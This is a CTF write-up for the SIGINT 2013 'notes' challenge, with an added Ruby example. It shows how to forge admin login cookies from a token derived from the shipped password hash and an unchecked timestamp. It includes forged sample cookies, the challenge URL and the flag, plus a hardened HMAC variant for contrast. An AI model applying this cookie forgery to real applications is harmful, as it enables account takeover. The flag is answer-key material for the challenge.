SIGINT CTF 2013 - Writeup cloud - notes

Notes is a web application that lets users register and share messages. Reading the delivered source reveals a cookie-based authorization method built on a token.

The method authenticates purely from cookies. The delivered source shows that an admin user exists (data/notes/admin/), and since the token is derived only from data that ships with that source, you can generate a valid token for the admin user yourself.

Method authorize_with_token:

def authorize_with_token(token, salt)
    # The per-user password_hash file (a bcrypt hash) doubles as the token key.
    password_data= Data.new(@user_dir+"password_hash")
    password_data.readlock do
        bcrypt_stuff= password_data.read
        # Accept when the hash file is non-empty and SHA256(hash || salt) equals the token.
        # salt is the login_time cookie; nothing checks that it is recent.
        unless not bcrypt_stuff.empty? and Digest::SHA256.hexdigest(bcrypt_stuff+salt) == token
            raise InvalidPasswordError, "invalid password"
        end
    end
    finish_authorization
end

The do_login method shows the generation of the login_token:

def do_login(user, title, request)
    ...
    # The current Unix time, as a string, is the salt for the token.
    login_time= Time.now.to_i.to_s
    login_token= user.login_token(login_time)
    # All three values are sent as plain cookies; no server-side secret is involved.
    Rack::Utils.set_cookie_header!(cookie, "login_name", user.name)
    Rack::Utils.set_cookie_header!(cookie, "login_time", login_time)
    Rack::Utils.set_cookie_header!(cookie, "login_token", login_token)

The login_token method shows exactly how the token is computed; the same computation produces a token for the admin user.

def login_token(salt)
    # Normally only reachable after a successful login, but the computation
    # needs nothing beyond the password_hash file and the salt.
    check_authorized
    password_data= Data.new(@user_dir+"password_hash")
    password_data.readlock do
        Digest::SHA256.hexdigest(password_data.read+salt)
    end
end

To generate the token, compute:

Digest::SHA256.hexdigest(bcrypt_stuff+salt)

bcrypt_stuff is the exact content of the file users/admin/password_hash as shipped with the source (use the bytes verbatim, including any trailing newline, because the server hashes password_data.read unchanged).
salt is the timestamp string you choose; it must be sent as the login_time cookie, and the server does not check that it is current.

Sample cookies (login_token is SHA256 of the shipped admin hash concatenated with the login_time string):

"login_name" : admin
"login_time" : 1373068730
"login_token" : a76b29f110644b2fb61167d53b87d0f2b2e5e65981ff33d80f51a86233233c33
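The forgery above, as an added Ruby example (not code from the challenge or the writeup). It reproduces the server's token derivation and check, builds the three cookies for the admin user, and, going beyond the page, shows a keyed variant with an expiry window that the same forgery does not pass. ADMIN_PASSWORD_HASH is a constructed stand-in for the real users/admin/password_hash content, and the hardened_* functions and the secret are assumptions for illustration.

```ruby
require 'digest'
require 'openssl'
require 'cgi'

# Constructed stand-in for the content of users/admin/password_hash as shipped
# with the source. The real file's bytes must be used verbatim (trailing
# newline included) because the server hashes password_data.read unchanged.
ADMIN_PASSWORD_HASH = "$2a$10$constructedexamplebcryptsaltandhashforthenoteadmin00\n"

# Mirrors User#login_token / authorize_with_token from the challenge:
# token = SHA256(<password_hash file content> || <login_time as a string>).
def forge_login_token(bcrypt_stuff, login_time)
  Digest::SHA256.hexdigest(bcrypt_stuff + login_time.to_s)
end

# Builds the three cookies do_login would set, joined for a Cookie: header.
def forge_cookie_header(name, bcrypt_stuff, login_time = Time.now.to_i)
  token = forge_login_token(bcrypt_stuff, login_time)
  { "login_name" => name, "login_time" => login_time.to_s, "login_token" => token }
    .map { |k, v| "#{k}=#{CGI.escape(v)}" }.join("; ")
end

# The server-side check as written in authorize_with_token, with the
# Data/readlock plumbing replaced by a plain string argument.
def server_accepts?(bcrypt_stuff, login_time, token)
  !bcrypt_stuff.empty? && Digest::SHA256.hexdigest(bcrypt_stuff + login_time) == token
end

# Constant-time comparison so a verifier does not leak matching prefixes.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Assumed fixed design (not the challenge's code): the token depends on a
# server-side secret that is not in the shipped source, and login_time is
# bounded so a captured cookie cannot be replayed forever.
def hardened_token(secret, name, login_time)
  OpenSSL::HMAC.hexdigest("SHA256", secret, "#{name}|#{login_time}")
end

def hardened_accepts?(secret, name, login_time, token, now: Time.now.to_i, max_age: 3600)
  return false unless login_time =~ /\A\d+\z/
  t = login_time.to_i
  return false if t > now || now - t > max_age
  secure_equal?(hardened_token(secret, name, login_time), token)
end

if __FILE__ == $PROGRAM_NAME
  # Forge a cookie for the admin user using the page's sample timestamp.
  puts forge_cookie_header("admin", ADMIN_PASSWORD_HASH, 1373068730)
end
```

Send the printed string as the Cookie: header of a request for /view/admin/secret. The one practical pitfall is byte-exactness of bcrypt_stuff: hash the file content as read, not a trimmed copy, or the digest will not match what the server computes.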

With these cookies set, the key can be read from the admin's note named secret:
http://1f.ctf.sigint.ccc.de/view/admin/secret

Key: SIGINT_acid_is_important_c3d08b685f867703


Defragmented Brains 2013-2016